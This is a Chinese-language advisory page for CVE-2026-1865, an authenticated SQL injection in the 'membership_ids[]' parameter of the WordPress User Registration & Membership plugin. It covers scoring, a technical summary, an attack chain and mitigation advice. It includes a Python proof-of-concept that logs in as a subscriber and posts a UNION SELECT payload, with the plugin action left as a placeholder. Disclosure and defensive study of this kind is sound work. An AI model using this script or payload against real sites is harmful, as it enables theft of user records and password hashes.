CVE-2026-1865 CVSS 6.5 中危

CVE-2026-1865 WordPress插件SQL注入漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1865

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

User Registration & Membership WordPress插件

漏洞概述

WordPress的User Registration & Membership插件在5.1.2及之前版本中存在SQL注入漏洞。该漏洞由于对'membership_ids[]'参数缺乏足够的转义和SQL查询准备导致。拥有订阅者及以上权限的经过身份验证的攻击者，可利用此漏洞向现有查询追加SQL语句，进而从数据库中窃取敏感信息，构成较高的数据泄露风险。

技术细节

该漏洞的核心在于插件后端在处理用户提交的'membership_ids[]'参数时，未实施严格的安全编码规范，直接将未经过滤的用户输入拼接到SQL查询语句中，导致了经典的SQL注入漏洞。尽管需要经过身份验证，但权限要求极低（仅需订阅者权限），大大降低了攻击门槛。攻击者通过构造特定的HTTP POST请求，在参数中注入恶意SQL代码（如基于布尔或时间的盲注Payload，或者UNION SELECT查询），可以欺骗数据库执行非授权命令。由于CVSS向量显示完整性(I)和可用性(A)无影响，该漏洞主要用于数据窃取。攻击者可借此读取用户表、配置信息等敏感数据，进而为后续攻击提供凭证，但无法直接通过此漏洞篡改或破坏数据库内容。

攻击链分析

STEP 1

侦察与认证

攻击者探测目标网站是否安装了User Registration & Membership插件，并注册一个低权限（订阅者）账号。

STEP 2

漏洞利用

攻击者使用该账号登录，获取有效的Session Cookie，并向处理'membership_ids[]'参数的端点发送包含恶意SQL注入代码的POST请求。

STEP 3

数据提取

服务器解析请求时执行了被注入的SQL语句，攻击者根据返回的报错信息或页面内容差异（盲注），提取数据库中的敏感数据如用户名和密码哈希。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Attacker credentials (Subscriber level)
username = "attacker"
password = "password"

# 1. Login to get session cookie
session = requests.Session()
login_data = {
    "log": username,
    "pwd": password,
    "redirect_to": "",
    "wp-submit": "Log In"
}
login_resp = session.post("http://example.com/wp-login.php", data=login_data)

if login_resp.status_code == 200:
    print("[+] Login successful")

    # 2. Exploit SQL Injection via 'membership_ids[]'
    # Payload to extract database user (Example)
    payload = "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
    
    exploit_data = {
        "action": "some_vulnerable_action", # Action needs to be specific to the plugin functionality
        "membership_ids[]": payload
    }

    response = session.post(target_url, data=exploit_data)
    
    # 3. Analyze response
    if response.status_code == 200:
        print("[+] Payload sent")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit request failed")
else:
    print("[-] Login failed")

影响范围

User Registration & Membership <= 5.1.2

防御指南

临时缓解措施

建议网站管理员立即检查插件版本并更新至最新修复版本。如果暂时无法更新，应考虑禁用该插件或通过服务器端规则（如ModSecurity）阻断对包含'membership_ids[]'参数的请求的处理，以防止漏洞被利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表